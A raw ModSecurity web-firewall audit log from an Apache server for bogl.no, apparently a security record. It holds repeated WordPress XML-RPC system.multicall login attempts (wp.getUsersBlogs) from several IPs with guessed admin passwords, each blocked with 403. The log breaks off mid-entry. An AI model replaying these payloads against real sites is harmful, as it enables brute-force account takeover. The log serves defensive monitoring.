p1=410, p2=3090, p3=0, p4=0, p5=98, sr=85, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c7dfc24-Z-- --4e9add1a-A-- [05/Jun/2025:13:38:24 +0700] aEE7YCrHpfaS2Cuwh8XVCgAAAEY 103.236.140.4 38026 103.236.140.4 8181 --4e9add1a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 14.225.216.240 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 14.225.216.240 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4e9add1a-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh45 --4e9add1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e9add1a-E-- --4e9add1a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.225.216.240 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749105504662166 4993 (- - -) Stopwatch2: 1749105504662166 4993; combined=3758, p1=427, p2=3162, p3=0, p4=0, p5=99, sr=85, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e9add1a-Z-- --6eeda57e-A-- [05/Jun/2025:13:43:34 +0700] aEE8lirHpfaS2Cuwh8XVHwAAAEU 103.236.140.4 38174 103.236.140.4 8181 --6eeda57e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.166.185.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.166.185.26 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6eeda57e-C-- system.multicallmethodNamewp.getUsersBlogsparamsandre1234567890 --6eeda57e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6eeda57e-E-- --6eeda57e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.166.185.26 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749105814258222 5766 (- - -) Stopwatch2: 1749105814258222 5766; combined=4075, p1=513, p2=3395, p3=0, p4=0, p5=99, sr=101, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6eeda57e-Z-- --5ea1fa20-A-- [05/Jun/2025:13:44:02 +0700] aEE8sirHpfaS2Cuwh8XVJQAAAEw 103.236.140.4 38190 103.236.140.4 8181 --5ea1fa20-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 5.161.42.79 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 5.161.42.79 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5ea1fa20-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin123456a@ --5ea1fa20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ea1fa20-E-- --5ea1fa20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 5.161.42.79 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749105842715555 5430 (- - -) Stopwatch2: 1749105842715555 5430; combined=4024, p1=491, p2=3358, p3=0, p4=0, p5=103, sr=89, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ea1fa20-Z-- --b278565d-A-- [05/Jun/2025:13:45:30 +0700] aEE9Cn-K7ToMdu-YSIIk-wAAAAE 103.236.140.4 38224 103.236.140.4 8181 --b278565d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b278565d-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminTest123 --b278565d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b278565d-E-- --b278565d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749105930556683 5723 (- - -) Stopwatch2: 1749105930556683 5723; combined=4061, p1=515, p2=3376, p3=0, p4=0, p5=101, sr=85, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b278565d-Z-- --11d88a70-A-- [05/Jun/2025:13:47:24 +0700] aEE9fOth7G2xELALzPYjYQAAANQ 103.236.140.4 38262 103.236.140.4 8181 --11d88a70-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --11d88a70-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix@2020 --11d88a70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11d88a70-E-- --11d88a70-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749106044896226 5621 (- - -) Stopwatch2: 1749106044896226 5621; combined=3952, p1=487, p2=3298, p3=0, p4=0, p5=99, sr=89, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11d88a70-Z-- --d150b855-A-- [05/Jun/2025:13:47:52 +0700] aEE9mCrHpfaS2Cuwh8XVNAAAAEw 103.236.140.4 38276 103.236.140.4 8181 --d150b855-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 14.225.216.240 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 14.225.216.240 X-Forwarded-Proto: https Connection: close Content-Length: 478 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d150b855-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdMiN --d150b855-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d150b855-E-- --d150b855-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.225.216.240 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749106072030201 5778 (- - -) Stopwatch2: 1749106072030201 5778; combined=4136, p1=501, p2=3475, p3=0, p4=0, p5=94, sr=95, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d150b855-Z-- --54d7f52b-A-- [05/Jun/2025:13:50:15 +0700] aEE-J1wdJdhOudw5hdzPzgAAAI0 103.236.140.4 38382 103.236.140.4 8181 --54d7f52b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 77.222.57.100 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 77.222.57.100 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --54d7f52b-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminabcd1234 --54d7f52b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54d7f52b-E-- --54d7f52b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 77.222.57.100 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749106215271894 5844 (- - -) Stopwatch2: 1749106215271894 5844; combined=4096, p1=527, p2=3391, p3=0, p4=0, p5=106, sr=122, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54d7f52b-Z-- --b8b46277-A-- [05/Jun/2025:13:52:06 +0700] aEE-lirHpfaS2Cuwh8XVRQAAAEg 103.236.140.4 38420 103.236.140.4 8181 --b8b46277-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.166.185.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.166.185.26 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b8b46277-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminHWZ@2021 --b8b46277-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8b46277-E-- --b8b46277-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.166.185.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749106326289507 5886 (- - -) Stopwatch2: 1749106326289507 5886; combined=4171, p1=515, p2=3480, p3=0, p4=0, p5=103, sr=102, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8b46277-Z-- --1424a05f-A-- [05/Jun/2025:13:54:52 +0700] aEE_POth7G2xELALzPYjcAAAAMI 103.236.140.4 38476 103.236.140.4 8181 --1424a05f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 77.222.57.100 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 77.222.57.100 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --1424a05f-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin4 --1424a05f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1424a05f-E-- --1424a05f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 77.222.57.100 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749106492523270 4872 (- - -) Stopwatch2: 1749106492523270 4872; combined=3685, p1=395, p2=3118, p3=0, p4=0, p5=100, sr=80, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1424a05f-Z-- --b5334d73-A-- [05/Jun/2025:13:56:54 +0700] aEE_tVwdJdhOudw5hdzP2wAAAIM 103.236.140.4 38574 103.236.140.4 8181 --b5334d73-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.166.185.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.166.185.26 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b5334d73-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmintesting123 --b5334d73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5334d73-E-- --b5334d73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.166.185.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749106613995350 5991 (- - -) Stopwatch2: 1749106613995350 5991; combined=4323, p1=509, p2=3637, p3=0, p4=0, p5=104, sr=100, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5334d73-Z-- --a7017c79-A-- [05/Jun/2025:13:59:11 +0700] aEFAP-th7G2xELALzPYjjgAAANM 103.236.140.4 38666 103.236.140.4 8181 --a7017c79-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.166.185.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.166.185.26 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a7017c79-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh89 --a7017c79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7017c79-E-- --a7017c79-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.166.185.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749106751612695 5922 (- - -) Stopwatch2: 1749106751612695 5922; combined=4462, p1=533, p2=3644, p3=0, p4=0, p5=159, sr=90, sw=126, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7017c79-Z-- --452bce1b-A-- [05/Jun/2025:14:05:08 +0700] aEFBpH-K7ToMdu-YSIIlVQAAAAc 103.236.140.4 38898 103.236.140.4 8181 --452bce1b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.166.185.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.166.185.26 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --452bce1b-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin1123456 --452bce1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --452bce1b-E-- --452bce1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.166.185.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749107108379330 5397 (- - -) Stopwatch2: 1749107108379330 5397; combined=4059, p1=446, p2=3297, p3=0, p4=0, p5=214, sr=87, sw=102, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --452bce1b-Z-- --b14c2c3b-A-- [05/Jun/2025:14:12:46 +0700] aEFDblwdJdhOudw5hdzQGgAAAIw 103.236.140.4 39122 103.236.140.4 8181 --b14c2c3b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b14c2c3b-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmingoogle --b14c2c3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b14c2c3b-E-- --b14c2c3b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749107566667460 4829 (- - -) Stopwatch2: 1749107566667460 4829; combined=3534, p1=399, p2=2962, p3=0, p4=0, p5=104, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b14c2c3b-Z-- --5aaaff5d-A-- [05/Jun/2025:14:14:49 +0700] aEFD6eth7G2xELALzPYjwwAAAMo 103.236.140.4 39170 103.236.140.4 8181 --5aaaff5d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 173.212.221.77 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 173.212.221.77 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5aaaff5d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehtest123 --5aaaff5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5aaaff5d-E-- --5aaaff5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 173.212.221.77 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749107689543780 5590 (- - -) Stopwatch2: 1749107689543780 5590; combined=4095, p1=536, p2=3366, p3=0, p4=0, p5=112, sr=88, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5aaaff5d-Z-- --793da438-A-- [05/Jun/2025:14:15:10 +0700] aEFD_uth7G2xELALzPYjxAAAAMw 103.236.140.4 39174 103.236.140.4 8181 --793da438-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --793da438-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh.1234 --793da438-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --793da438-E-- --793da438-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749107710544461 6261 (- - -) Stopwatch2: 1749107710544461 6261; combined=4432, p1=529, p2=3726, p3=0, p4=0, p5=105, sr=89, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --793da438-Z-- --68e15166-A-- [05/Jun/2025:14:18:03 +0700] aEFEq-th7G2xELALzPYjzAAAANQ 103.236.140.4 39258 103.236.140.4 8181 --68e15166-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --68e15166-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix123. --68e15166-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68e15166-E-- --68e15166-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749107883817152 6050 (- - -) Stopwatch2: 1749107883817152 6050; combined=4289, p1=520, p2=3590, p3=0, p4=0, p5=106, sr=95, sw=73, l=0, 